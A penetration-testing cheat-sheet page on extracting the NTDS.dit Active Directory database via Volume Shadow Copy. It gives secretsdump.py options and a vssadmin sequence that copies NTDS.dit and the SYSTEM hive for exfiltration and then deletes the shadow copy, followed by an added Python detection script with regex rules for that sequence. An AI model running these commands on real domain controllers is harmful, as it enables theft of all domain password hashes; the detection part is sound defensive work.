# Volume Shadow Copy

Volume Shadow Copy Service (VSS) is a Windows feature that creates point-in-time snapshots, or shadow copies, of volumes and the files on them. Backup software relies on these snapshots, and on a Domain Controller they include a consistent copy of the NTDS.dit Active Directory database, a file that is otherwise locked while the directory service is running.

The built-in command-line tool *vssadmin* can be used to take a shadow copy and extract NTDS.dit together with the SYSTEM registry hive, which holds the Boot Key needed to decrypt the password hashes stored in NTDS.dit.

{% hint style="info" %}
*vssadmin* should be run from an elevated command prompt on the Domain Controller itself.
{% endhint %}

## Exploit

{% tabs %}
{% tab title="secretsdump.py" %}
{% code title="Linux" %}

```fish
## -use-vss Makes secretsdump Take A Shadow Copy On The DC With vssadmin Instead Of Using DRSUAPI (DCSync)
secretsdump.py [domain/]username[:password]@<DC hostname or IP> -use-vss <options>

OPTIONS
-just-dc                    Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm               Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username]    Extract Only NTDS.dit Data For Specified User
-user-status                Display If The User Is Disabled
-history                    Dump Password History
-outputfile                 Base Output Filename

-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File
```

{% endcode %}
{% endtab %}

{% tab title="vssadmin" %}
{% code title="Windows" %}

```powershell
## Create A Shadow Copy Of The C Drive (Note The Shadow Copy Volume Name And Shadow Copy ID It Prints)
vssadmin create shadow /for=C:

## Copy The NTDS.dit And SYSTEM Hive From The Shadow Copy To Be Exfiltrated
copy [ShadowCopyName]\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
copy [ShadowCopyName]\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save

## Delete The Shadow Copy We Created To Clean Up A Bit
vssadmin delete shadows /shadow=[ShadowCopyID]
```

{% endcode %}

{% code title="Linux" %}

```fish
## Use impacket-secretsdump To Parse The Exfiltrated Files
impacket-secretsdump -ntds ntds.dit.save -system system.save LOCAL
```

{% endcode %}
{% endtab %}
{% endtabs %}
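The detection-side counterpart to the sequence above, added here as an example and not part of the original page or of impacket: it matches process command lines (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) for the `vssadmin create`/`delete` calls and for reads of NTDS.dit or the SYSTEM hive out of a `HarddiskVolumeShadowCopy` device, then rates each host by whether the whole sequence was seen, since a shadow copy creation by itself is routine backup activity. The event records, host names and rule names are constructed for the example.

```python
import re

# Constructed Sysmon Event ID 1 / Security 4688 style process-creation
# records, reduced to the fields the rules need. Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DC01", "cmdline": "vssadmin create shadow /for=C:"},
    {"host": "DC01", "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"
                                r"\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save"},
    {"host": "DC01", "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"
                                r"\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save"},
    {"host": "DC01", "cmdline": "vssadmin delete shadows /shadow={SHADOW-ID-PLACEHOLDER}"},
    {"host": "WS07", "cmdline": "vssadmin list shadows"},
]

# Each rule is a name plus a pattern applied to the process command line.
RULES = [
    ("vss_shadow_created", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("vss_shadow_deleted", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("ntds_read_from_shadow",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\NTDS\\ntds\.dit\b", re.I)),
    ("system_hive_read_from_shadow",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\Config\\SYSTEM\b", re.I)),
]
CREDENTIAL_READS = {"ntds_read_from_shadow", "system_hive_read_from_shadow"}


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def correlate(events):
    """Group rule hits per host and rate each host: 'high' when a shadow copy
    was created and NTDS.dit or the SYSTEM hive was then read from a shadow
    copy, 'medium' for either half alone, 'low' for a bare shadow deletion."""
    hits = {}
    for ev in events:
        for name in classify(ev["cmdline"]):
            hits.setdefault(ev["host"], set()).add(name)
    alerts = {}
    for host, names in hits.items():
        if "vss_shadow_created" in names and names & CREDENTIAL_READS:
            alerts[host] = "high"
        elif "vss_shadow_created" in names or names & CREDENTIAL_READS:
            alerts[host] = "medium"
        else:
            alerts[host] = "low"
    return hits, alerts
```

Running `correlate(SAMPLE_EVENTS)` rates DC01 as `high` and leaves WS07 unreported, because `vssadmin list shadows` matches no rule.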
